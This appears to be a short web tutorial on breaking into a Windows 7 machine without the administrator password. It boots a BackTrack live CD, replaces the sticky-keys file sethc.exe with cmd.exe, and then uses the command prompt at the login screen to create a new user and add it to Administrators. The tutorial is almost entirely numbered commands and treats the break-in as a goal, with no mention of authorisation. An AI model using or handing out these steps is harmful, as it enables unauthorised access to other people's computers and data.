hacking windows 7 username and password using backtrack

       Windows Hacking
Here we’ll learn how to break an Administrators password or to create an account without knowing the Administrator password.
We need a backtrack CD What we’ll do here is, we will change the sticky key file “sethc.exe” file name to “cmd.exe” file so that if we will press the shift button 5 times on the login screen the command prompt will come up. Once the command prompt displayed we can make a user through command and can give the Administrators rights to him.

Steps :
  Insert the CD in CD-ROM Live boot the system through the backtrack O/S, Select the boot priority by pressing F12 CD/DVD
After the machine will boot if it will ask you for the login, then the

Username = Root 
Password = toor

Type “startx” to change CLI to GUI
Once you come to the GUI

2. Open a Terminal
#fdisk –l              
         (To check the free disk)

3. #mkdir /mnt/cdrive
           (To make a directory to mount the cdrive, you can use any name here it is just a folder name)

4. #mount –t ntfs /dev/sda2 /mnt/cdrive
       (Mount the C drive i.e. /dev/sda2 in  cdrive folder)

5. #cd /mnt/cdrive
      (To change the directory/ to open the directory)

6. #cd /Windows/Sytem32                           
      (To see the System 32 folder)

7. #ls –l                                                      
     (To get the list of the files in System 32 folder)

8. #cp sethc.exe sethcbk.up                        
    (To take the Backup of the sethc.exe file)

9. #cp cmd.exe sethc.exe                            
     (To rename the file name)

10. Now restart the system
 #init 6 / reboot
You can eject the CD now
Now you’ve the windows login screen in front of you.

11. Press “shift key” 5 times
It will show you the command prompt now, make the user.

12. #net user username password /add
e.g  >net user abc 12345678 /add
Now you’ve the user, you need to give Administrators right.

13: #net localgroup Administrators /add username

e.g  >net localgroup Administrators /add abc

Restart the system now and Login with the new user!!
You will notice that you have the administrative rights now. AWESOME !!!


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